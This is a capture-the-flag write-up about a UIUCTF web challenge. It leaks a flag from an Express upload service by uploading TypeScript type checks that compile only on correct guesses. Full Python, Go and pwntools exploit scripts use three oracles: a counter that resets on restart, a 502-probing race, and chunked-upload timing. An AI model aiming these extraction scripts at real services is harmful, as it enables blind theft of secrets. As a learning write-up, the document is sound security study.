Though the code behind this challenge was minimal, it was still lethal. While working on it I stumbled into a rabbit hole, which ended up leading me to two "unintended" solutions.

I'll start by walking through the intended solution path, since that's what got me the flag in the end. Then I'll talk about the main rabbit hole I explored, and finally I'll share the two unintended solutions I discovered during the competition.



Upload, Upload

We're dealing with an Express web app, and everything we need is concentrated in just a few files.

The webapp code can be found in the `dist/` directory, which contains transpiled JavaScript files, meaning the original TypeScript files have been "compiled" to JavaScript (if this sounds new, it may help to read part of this article until it feels familiar).

The web app provides functionality to upload files via an endpoint that uses Multer for file handling.

    let fileCount = 0;

    const storage = multer.diskStorage({
      destination: function (req, file, cb) {
        cb(null, imagesDir);
      },
      filename: function (req, file, cb) {
        cb(null, path.basename(file.originalname));
      },
    });

    const upload = multer({ storage })

    app.post("/upload", upload.single("file"), (req, res) => {
      if (!req.file) {
        return res.status(400).send("No file uploaded.");
      }
      fileCount++;
      res.send("File uploaded successfully.");
    });

As noted in the Multer documentation:

"The disk storage engine gives you full control on storing files to disk. There are two options available, `destination` and `filename`. They are both functions that determine where the file should be stored."

Here, the upload endpoint saves files to a directory (`imagesDir`), using the base name of the original file. If no file is uploaded, it returns an error. Otherwise, it increments the file counter and sends a success message.
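To make the request shape concrete, here is a minimal sketch of the multipart body a client would send to this endpoint. The field name `file` comes from `upload.single("file")`; the helper name `build_multipart`, the boundary string, and the sample file are made up for illustration.

```python
def build_multipart(field: str, filename: str, content: str, boundary: str) -> bytes:
    """Encode a single file part as a multipart/form-data body."""
    lines = [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"',
        "Content-Type: text/plain",
        "",                  # blank line separates part headers from content
        content,
        f"--{boundary}--",   # closing boundary
        "",
    ]
    return "\r\n".join(lines).encode()


# Hypothetical values, chosen only for this sketch.
boundary = "----sketchboundary1234"
body = build_multipart("file", "note.txt", "hello", boundary)
headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}

print(body.decode())
```

The `filename` value in the `Content-Disposition` header is what Multer exposes as `file.originalname`, which is why it is attacker-controlled.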

Digging into the Multer GitHub code, we notice that no sanitization is performed by Multer itself:

    DiskStorage.prototype._handleFile = function _handleFile (req, file, cb) {
      ...
      var finalPath = path.join(destination, filename)
      var outStream = fs.createWriteStream(finalPath)
      ...
    }

Since `finalPath` is created by joining `destination` and `filename`, a malicious `filename` (containing sequences like `../`) could allow files to be written outside the intended directory.

However, in the web app, `path.basename(file.originalname)` is used for the filename, which strips any directory components and effectively prevents such path traversal attacks.
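The difference can be illustrated with a small Python analogue of the two behaviours. This is only a sketch: `posixpath` stands in for Node's `path` module, and `/app/images` is an assumed location for `imagesDir`, not the challenge's real path.

```python
import posixpath

IMAGES_DIR = "/app/images"  # hypothetical upload directory


def unsafe_target(filename: str) -> str:
    # Mirrors path.join(destination, filename) with no sanitization.
    return posixpath.normpath(posixpath.join(IMAGES_DIR, filename))


def safe_target(filename: str) -> str:
    # Mirrors path.basename(file.originalname) applied before the join.
    return posixpath.normpath(
        posixpath.join(IMAGES_DIR, posixpath.basename(filename))
    )


print(unsafe_target("../dist/index.js"))  # /app/dist/index.js
print(safe_target("../dist/index.js"))    # /app/images/index.js
```

With the base name taken first, the traversal sequence is discarded and the file stays inside the upload directory.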

We can upload files, nice. So what?

Unboxing 📦.json

Simply being able to write files in `imagesDir` doesn't give us much to work with. Let's open another important file: `package.json`.

    {
      "name": "tschal",
      "version": "1.0.0",
      "scripts": {
        "start": "concurrently \"tsc -w\" \"nodemon dist/index.js\""
      },
      "keywords": [
        "i miss bun, if only there was an easier way to use typescript and nodejs :)"
      ],
      "author": "",
      "license": "ISC",
      "description": "",
      "devDependencies": {
        ...
      },
      "dependencies": {
        "express": "^5.1.0",
        "multer": "^2.0.2"
      }
    }

This file not only describes our project's metadata and dependencies, but also contains scripts that define how the application is built and run.

The `scripts` section in `package.json` defines command shortcuts that can be executed with npm. In this case, there is a single script called `start`. Running `npm start` executes the following command:

    concurrently "tsc -w" "nodemon dist/index.js"

This command uses the `concurrently` package to run two processes at the same time. The first, `tsc -w`, starts the TypeScript compiler in watch mode, so it automatically recompiles TypeScript files whenever changes occur. The second, `nodemon dist/index.js`, runs the web app using `nodemon`, which restarts the server whenever changes are detected in specific files.

By default, nodemon monitors the current working directory. It watches files with the `.js`, `.mjs`, `.coffee`, `.litcoffee`, and `.json` extensions.

Running `tsc` locally will compile the closest project defined by a `tsconfig.json`, which in this challenge is the following:

    {
      "compilerOptions": {
        "module": "nodenext",
        "esModuleInterop": true,
        "target": "esnext",
        "moduleResolution": "nodenext",
        "noEmitOnError": true,
        "sourceMap": true,
        "outDir": "dist"
      }
    }

There's no need to explain all of them. Two of them are really important for this challenge: `noEmitOnError` and `outDir`.

- `noEmitOnError`: When this option is enabled, the TypeScript compiler will not emit compiler output files if any errors were reported. This ensures that only valid, type-safe code gets compiled and placed in the output directory.
- `outDir`: This option specifies the directory where all compiled JavaScript files will be placed. In this case, it is set to `dist`.

Now, one might think that uploading an `index.ts` file would, once compiled, overwrite the current webapp code in `dist/index.js`. That is not what happens. The TypeScript compiler (`tsc`) preserves each source file's relative path, so any file uploaded to the images directory (`images/`) is compiled into `dist/images/`.
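The mapping can be sketched in a few lines of Python. This is a simplified model, not tsc's actual implementation: it assumes the project lives at a hypothetical `/app`, and that the compiler's root directory is the project root because the app's own `index.ts` sits there.

```python
import posixpath

PROJECT_ROOT = "/app"      # hypothetical project location
OUT_DIR = "/app/dist"      # corresponds to "outDir": "dist"


def emitted_path(source: str) -> str:
    """Model where a .ts source ends up: same relative path, under OUT_DIR."""
    relative = posixpath.relpath(source, PROJECT_ROOT)
    stem, _extension = posixpath.splitext(relative)
    return posixpath.join(OUT_DIR, stem + ".js")


print(emitted_path("/app/index.ts"))         # /app/dist/index.js
print(emitted_path("/app/images/index.ts"))  # /app/dist/images/index.js
```

An uploaded `index.ts` therefore lands next to, not on top of, the real entry point.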

Not all is lost. Let's see some cool quirks of TypeScript.

turing_complete_azolwkamgj

(If you don't understand the title… don't worry, it will make sense later).

A language is Turing complete if it can simulate any Turing machine… essentially, if it can express any computation given enough resources (memory and time).

Amazingly, the TypeScript type system itself is Turing complete. That means you can write computations (using recursive type aliases, conditional types, etc.) within TypeScript's type definitions, even without running any JavaScript.



Here's an example:

    type StringEqual<A extends string, B extends string> =
      A extends B ? (B extends A ? true : false) : false;

    type Test1 = StringEqual<'foo', 'foo'>; // true

    const a : Test1 = false

    // Output:
    // error TS2322: Type 'false' is not assignable to type 'true'.

How is this relevant? Well, it could be the case (and in fact it is) that the web app exports the flag in its code:

    export const flag = "uiuctf{fake_flag_xxxxxxxxxxxxxxxx}";

Therefore, the flag value is known at compile time and we can access it in TypeScript:

    // we are compiling in dist/images/, therefore
    // the web app file will be one directory above
    import { flag } from '../index'

Not only that, but we can even check if the flag starts with a specific string:

    type StartsWith<S extends string, Prefix extends string> =
      S extends `${Prefix}${string}` ? true : false;

    type Trigger = StartsWith<typeof flag, "uiuctf{">;

    const _check: Trigger = true;

This code will cause a TypeScript error if the flag does not start with `"uiuctf{"`, and will not produce a compiled JavaScript file (because of the `noEmitOnError` option seen before). Otherwise, the file will compile successfully and the output will be placed in `dist/images`.

There's a catch: we have no way to see this error and therefore no way to determine the flag at the moment.

The approach is valid, though. If only there were some type of oracle to blindly exfiltrate the flag… 🙏
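To see why a yes/no answer per guess is enough, here is a minimal sketch of prefix-by-prefix extraction against an abstract boolean oracle. The names `extract`, `oracle`, and `SECRET` are made up for this illustration, and the secret is a placeholder rather than the real flag; the oracle simply plays the role of "did the file compile?".

```python
from typing import Callable


def extract(oracle: Callable[[str], bool], charset: str, max_len: int) -> str:
    """Recover a secret one character at a time from a prefix oracle."""
    known = ""
    while len(known) < max_len:
        for ch in charset:
            if oracle(known + ch):
                known += ch
                break
        else:
            # No candidate extends the known prefix: the secret is complete.
            break
    return known


SECRET = "uiuctf{fake}"  # placeholder value for the demo
queries = 0


def oracle(guess: str) -> bool:
    # Stand-in for "the TypeScript file compiled without errors".
    global queries
    queries += 1
    return SECRET.startswith(guess)


recovered = extract(oracle, "abcdefghijklmnopqrstuvwxyz_{}", 40)
print(recovered, queries)
```

The cost is at most one query per charset entry per position, so the number of uploads grows linearly with the flag length instead of exponentially.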

What the server doin

We know that if we upload an invalid TypeScript file, an error is raised and no compiled file is created.

And that's all, the server does nothing else.

What if we upload a valid TypeScript file?



Whoopity(-scoop). Something peculiar happens: the server restarts. Why is that?

It's actually quite simple. Since `nodemon` was started in the root project directory, it detects any file changes within that directory and its subdirectories. So, when our TypeScript file is compiled, the resulting JavaScript output in `dist/images/` is picked up by `nodemon`, which then triggers a restart of the web app.
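As a rough model of that behaviour, the check below decides whether a changed file would cause a restart based only on the default extensions listed earlier. It is a deliberate simplification: real nodemon also applies ignore rules and other configuration, and the function name `triggers_restart` is invented for this sketch.

```python
import posixpath

# Default extensions quoted earlier in this write-up.
WATCHED_EXTENSIONS = {".js", ".mjs", ".coffee", ".litcoffee", ".json"}


def triggers_restart(changed_path: str) -> bool:
    """Simplified model: a change matters only if its extension is watched."""
    extension = posixpath.splitext(changed_path)[1]
    return extension in WATCHED_EXTENSIONS


print(triggers_restart("images/aa.ts"))       # False
print(triggers_restart("dist/images/aa.js"))  # True
```

Uploading the `.ts` file alone is invisible to nodemon; it is the emitted `.js` file that trips the watcher, and that file only exists when compilation succeeds.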

Easy, right? (The Intended Path)

If you remember the upload endpoint I showed you at the beginning, you might have noticed a global variable:

    let fileCount = 0;

This variable is only incremented when a file is uploaded. However, if the app restarts, it resets back to zero.

Conveniently, we also have an endpoint that returns the current `fileCount` value:

    app.get("/filecount", (req, res) => {
      res.json({ file_count: fileCount });
    });

That's our oracle: by monitoring the value of `fileCount` through this endpoint, we can indirectly detect when the server has restarted.
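A toy in-memory model makes the signal explicit. `FakeServer` is a hypothetical stand-in for the challenge server, with the compile-and-restart step collapsed into a single prefix check against a placeholder secret.

```python
class FakeServer:
    """Toy model: an upload bumps the counter, a restart resets it."""

    def __init__(self, secret: str) -> None:
        self.secret = secret
        self.file_count = 0

    def upload(self, guess: str) -> None:
        self.file_count += 1
        if self.secret.startswith(guess):
            # The file compiles, nodemon restarts the app,
            # and the in-memory counter starts again from zero.
            self.file_count = 0

    def filecount(self) -> int:
        return self.file_count


server = FakeServer("uiuctf{fake}")  # placeholder secret

server.upload("x")
print(server.filecount())  # 1 -> wrong guess, no restart

server.upload("u")
print(server.filecount())  # 0 -> correct guess, server restarted
```

Because every upload increments the counter first, a value of zero right after an upload can only mean the process was restarted in between.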

We can now implement logic in the TypeScript file that causes a compilation error when the flag guess is incorrect, and compiles successfully when the guess is correct. This way, when the guess is correct, the server will restart and we can detect it thanks to the `filecount` endpoint.

    import requests
    import time

    # alphabet ordered by letter frequency in english
    charset = 'etaoinshrdlcumwfgypbvkjxqz' + '_{}'
    url = "http://localhost:3000"

    # here we could already add the first
    # part of the flag: uiuctf{
    flag = ""
    max_len = 40 # length limit

    # clean up the /images directory
    requests.delete(url + '/images')
    time.sleep(3)

    for pos in range(len(flag), max_len):
        for ch in charset:
            ts = f'''import {{ flag }} from '../index';
    type StartsWith<S extends string, Prefix extends string> =
      S extends `${{Prefix}}${{string}}` ? true : false;
    type Trigger = StartsWith<typeof flag, "{flag}{ch}">;
    const _check: Trigger = true;'''
            files = {"file": ('aa.ts', ts, "text/plain")}
            requests.post(url + "/upload", files=files, timeout=10)
            # typescript needs its sweet time to compile 🥵
            time.sleep(1)
            r = requests.get(url + "/filecount")
            fc = r.json().get("file_count")
            # a counter of 0 right after an upload means the server restarted
            if fc == 0:
                print(ch, end="", flush=True)
                flag += ch
                break
        else:
            # no character extended the flag: we are done
            break

    # Output:
    # uiuctf{turing_complete_azolwkamgj}

The Downfall

Initially, I was so focused on my path that I didn't even notice the `fileCount`. I followed a path that led me to despair.

While testing some things in Burp Suite on the localhost instance of the challenge, I noticed a difference in response times. More specifically, when the TypeScript was invalid, the request took ~1 second to complete, whereas when the TypeScript was valid, the request completed in ~280ms.

To be completely accurate, this isn't just the raw response time. The timing shown by Burp Suite involves additional processing or factors beyond a simple request/response.



I therefore turned to Wireshark to get a clearer picture of what Burp was actually measuring.

After making both requests (one with valid TypeScript and one with invalid TypeScript, in order), this is the result:

As you can see, from packet 1 to packet 10, we have the first request, which uses a valid file. If you calculate the difference between the timestamps of the last and the first packet, you'll find that the time is approximately 280ms.

For the other request (packets 11 to 20), the one with an invalid file, the timing is noticeably different and is around 1 second.

There is a logical reason for this. When we send a valid file, as mentioned before, the server restarts, abruptly cutting off our connection. This does not happen when we send an invalid file, so the request proceeds as it should.

Since we can detect when the connection is closed, we have discovered another oracle that can be used to extract the flag.
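On localhost, that oracle boils down to timing a request and comparing it to a cut-off. The sketch below shows the idea with the network call abstracted away as a callable; the 0.6 second threshold is an assumption picked between the ~280ms and ~1 second values observed above, and `timed` and `looks_valid` are names invented here.

```python
import time
from typing import Callable


def timed(send: Callable[[], None]) -> float:
    """Return how long the given request callable takes, in seconds."""
    start = time.perf_counter()
    send()
    return time.perf_counter() - start


def looks_valid(elapsed: float, threshold: float = 0.6) -> bool:
    # Short-lived connection -> the server restarted -> the guess compiled.
    # The threshold is a guess and would need tuning per environment.
    return elapsed < threshold


print(looks_valid(0.28))  # True
print(looks_valid(1.0))   # False
```

In practice `send` would wrap the upload request and wait for the connection to close, which is exactly the part that stops working once a proxy sits in between.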

Equipped with this, I was ready to test it on the remote server, but then… the final boss arrived:

For those who don't know it, Traefik is an open-source reverse proxy and load balancer designed to manage and route network traffic to microservices and applications.

When we try to connect to the remote service, we are actually connecting to Traefik, which in turn opens a connection to the service and forwards our request.

The issue here is that we are not connected directly to the service (as we would be on localhost) but to Traefik. Traefik does not automatically close the client connection just because the backend disconnected, as long as the client's request was served successfully.

This means that we will notice no difference in the packets between the valid and invalid requests when testing on the remote challenge.

What we observe instead is that both connections stay open for the same amount of time. This is due to the client-side timeout in the tool we're using to send requests. Since Traefik doesn't immediately close the client connection when the backend disconnects unexpectedly, the connection remains open until the client's timeout expires. As a result, from the client's perspective, both successful and failed requests have the same connection duration.

The Redemption (Racing through it)

I was not OK with that failure, and decided to look for another side-channel. One that is both logical and straightforward:

When the server restarts, there is inevitably a window during which it cannot fulfill requests. During this time, even Traefik can do nothing except return an error status code.

With this approach, we can treat the error status code as an oracle. After sending the request that might trigger a server restart, we follow up with multiple requests to probe the server's status. If we receive an error status code, it confirms that the server is temporarily down due to the restart.
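Independent of the language used for the actual exploit, the decision logic can be sketched as follows. The probe is passed in as a callable so the example runs without a network; `saw_restart` and its default values are illustrative choices, and 502 is used as the error code because that is what the exploit checks for.

```python
import time
from typing import Callable, Iterable


def saw_restart(
    probe: Callable[[], int],
    attempts: int = 30,
    delay: float = 0.01,
    error_codes: Iterable[int] = (502,),
) -> bool:
    """Poll the server a few times and report whether any probe failed."""
    codes = set(error_codes)
    for _ in range(attempts):
        if probe() in codes:
            return True
        time.sleep(delay)
    return False


# Simulated status codes: the third probe lands in the restart window.
responses = iter([200, 200, 502, 200])
print(saw_restart(lambda: next(responses), attempts=4, delay=0))  # True
```

The hard part in the real attack is not this check but making sure at least one probe actually falls inside the short restart window.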

This is a true race condition. That's why I found Go to be a better language for exploiting it.

    package main

    import (
        "bytes"
        "fmt"
        "mime/multipart"
        "net/http"
        "sync"
        "time"
    )

    var (
        charset = []rune("etaoinshrdlcumwfgypbvkjxqz_{}")
        url     = "https://inst-9e6b66042b792dc7-upload-upload-and-away.chal.uiuc.tf/"
        flag    = ""
        maxLen  = 40
    )

    // uploadFile sends a TypeScript file that only compiles
    // if the flag starts with val.
    func uploadFile(val string) {
        tsCode := fmt.Sprintf(
            "import { flag } from '../index';\n"+
                "type StartsWith<S extends string, Prefix extends string> = S extends `${Prefix}${string}` ? true : false;\n\n"+
                "type Trigger = StartsWith<typeof flag, \"%s\">;\n"+
                "const _check: Trigger = true;", val)

        var buf bytes.Buffer
        writer := multipart.NewWriter(&buf)
        part, _ := writer.CreateFormFile("file", "ee.ts")
        part.Write([]byte(tsCode))
        writer.Close()

        resp, err := http.Post(url+"upload", writer.FormDataContentType(), &buf)
        if err == nil {
            // release the connection once the upload is done
            resp.Body.Close()
        }
    }

    // errorProbe reports the status code of a single request (-1 on error).
    func errorProbe(wg *sync.WaitGroup, resultCh chan<- int) {
        defer wg.Done()
        resp, err := http.Get(url + "filecount")
        if err != nil {
            resultCh <- -1
            return
        }
        defer resp.Body.Close()
        resultCh <- resp.StatusCode
    }

    func main() {
        for len(flag) < maxLen {
            found := false
            for _, ch := range charset {
                resultCh := make(chan int, 30)
                var wg sync.WaitGroup

                go uploadFile(flag + string(ch))

                // the number of requests might need to be
                // adjusted depending on the testing environment
                for i := 0; i < 30; i++ {
                    // too fast, slow down boi
                    time.Sleep(10 * time.Millisecond)
                    wg.Add(1)
                    go errorProbe(&wg, resultCh)
                }

                go func() {
                    wg.Wait()
                    close(resultCh)
                }()

                for status := range resultCh {
                    if status == 502 {
                        fmt.Printf("%c", ch)
                        flag += string(ch)
                        found = true
                        // we don't want the next upload request to crash
                        // if this iteration restarted the server
                        time.Sleep(300 * time.Millisecond)
                        break
                    }
                }
                if found {
                    break
                }
            }
            if !found {
                break
            }
        }
    }

Notice that I'm using the `/filecount` endpoint, but any other endpoint would work just as well.

Also, race condition attacks are notoriously unreliable, so don't be surprised if the exploit doesn't work on the first try or requires some tweaking to succeed. I did my best to make it as stable as possible.

A race condition like this could be made much more difficult to exploit by implementing a rate limiter with Traefik, especially if the limits are set quite strictly.

But wait, suppose the previous methods were not feasible, either because the `/filecount` endpoint didn't exist or because a very strict rate limiter had been introduced. Are we screwed?

The Ascent

Not quite. Another side-channel is also available.

When Multer's `upload.single("file")` middleware is used with the disk storage engine, the uploaded file is streamed directly to disk as it is received. This streaming process is enabled by Multer's underlying use of Node.js streams and the Busboy library.

Busboy parses the multipart form and emits each file as a readable stream. The storage engine receives this stream in its `_handleFile` method. For the disk storage engine, the incoming stream is piped directly to a file on disk using Node's file system module:

    DiskStorage.prototype._handleFile = function _handleFile (req, file, cb) {
      ...
      var finalPath = path.join(destination, filename)
      var outStream = fs.createWriteStream(finalPath)

      file.stream.pipe(outStream)
      ...
    }

Instead of loading the entire file into memory, Multer reads and writes the file incrementally as data arrives.

As a result, files can be streamed via HTTP's chunked transfer encoding. But why would we need this?

Recall from The Downfall chapter that Traefik does not provide a way to detect when the connection to the web app has been closed. Traefik keeps the client connection open, even if the backend disconnects, as long as the client's request has already been served successfully.

So what happens if the server restarts while a file is still being uploaded and the client has not yet received a response? This is where multipart chunked requests come into play.

With chunked transfer encoding, we can control both the timing and the amount of data sent during an upload. For instance, we might begin by sending an initial chunk containing the TypeScript payload, which is streamed directly to the server's file system. Once the file is present, `tsc -w` will detect the new TypeScript file and automatically compile it, all while our connection to the server remains open and we have yet to receive a response.

After some time, we can send additional data over the same connection. However, if our payload included a valid substring of the flag and the server was restarted, causing the connection between Traefik and the backend to close, any attempt to send data to this closed connection will result in Traefik returning a 502 Bad Gateway error.
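For reference, this is how a chunked request body is framed on the wire: each chunk is its size in hexadecimal, a CRLF, the data, and another CRLF, and a zero-length chunk ends the body. The helper name `encode_chunk` and the sample payloads are made up for this sketch.

```python
def encode_chunk(data: bytes) -> bytes:
    """Frame one chunk: hex length, CRLF, payload, CRLF."""
    return f"{len(data):x}".encode() + b"\r\n" + data + b"\r\n"


# A zero-length chunk terminates a chunked body.
LAST_CHUNK = b"0\r\n\r\n"

print(encode_chunk(b"hello"))  # b'5\r\nhello\r\n'

# Two chunks that could be sent with an arbitrary pause in between.
body = encode_chunk(b"first part") + encode_chunk(b"second part") + LAST_CHUNK
print(body)
```

Since every chunk is self-delimiting, the client is free to wait as long as it likes between them, which is what leaves room for `tsc` to compile the first part before the second one is sent.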

Yet another oracle 🔥

This time, we will use Python and the `pwntools` module for more control over the request:

    from pwn import *
    import time

    context.log_level = 'error'

    host = "inst-b8693d7a49480eb9-upload-upload-and-away.chal.uiuc.tf"
    port = 443
    charset = 'etaoinshrdlcumwfgypbvkjxqz' + '_{}'
    flag = ''
    boundary = "----geckoformboundary1d7265c48a587e294b3bceedb9c889ce"
    filename = "a.ts"

    def send_chunk(conn, data):
        # the chunk size is the length of the encoded bytes, in hex
        payload = data.encode()
        conn.send(f"{len(payload):x}\r\n".encode())
        conn.send(payload)
        conn.send(b"\r\n")

    for _ in range(40):
        for ch in charset:
            typescript_payload = f'''import {{ flag }} from '../index';
    type StartsWith<S extends string, Prefix extends string> =
      S extends `${{Prefix}}${{string}}` ? true : false;
    type Trigger = StartsWith<typeof flag, "{flag}{ch}">;
    const _check: Trigger = true;'''
            file_content_2 = 'console.log("testb");'

            # First part of the multipart body (up to typescript_payload)
            body_start = (
                f"--{boundary}\r\n"
                f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
                f"Content-Type: text/plain\r\n\r\n"
                f"{typescript_payload}\n"
            )

            # Second part (file_content_2 and end boundary)
            body_end = (
                f"{file_content_2}\r\n"
                f"--{boundary}--\r\n"
            )

            # HTTP request headers
            request_headers = (
                "POST /upload HTTP/1.1\r\n"
                f"Host: {host}\r\n"
                f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
                "Transfer-Encoding: chunked\r\n"
                "Connection: keep-alive\r\n"
                "\r\n"
            )

            # Send headers
            conn = remote(host, port, ssl=True)
            conn.send(request_headers.encode())

            # Send first chunk
            send_chunk(conn, body_start)

            # Wait before sending the next chunk to
            # allow tsc to compile the TypeScript file
            time.sleep(0.5)

            # Send second chunk
            send_chunk(conn, body_end)

            # Send final zero-length chunk
            conn.send(b"0\r\n\r\n")

            # Get response
            response = conn.recvall(timeout=1)
            if b"Bad Gateway" in response:
                flag += ch
                print(f"[+] Found: {ch}", flush=True)
                print("Going to next iteration...\n")
                conn.close()
                break
            conn.close()
        else:
            # no character extended the flag: we are done
            break

    print("\n[+] Flag retrieved:", flag)

Conclusion

Thank you for reading, and special thanks to the author for creating this challenge. I genuinely enjoyed exploring the different side-channels and learned a lot along the way.

~ @uncavohdmi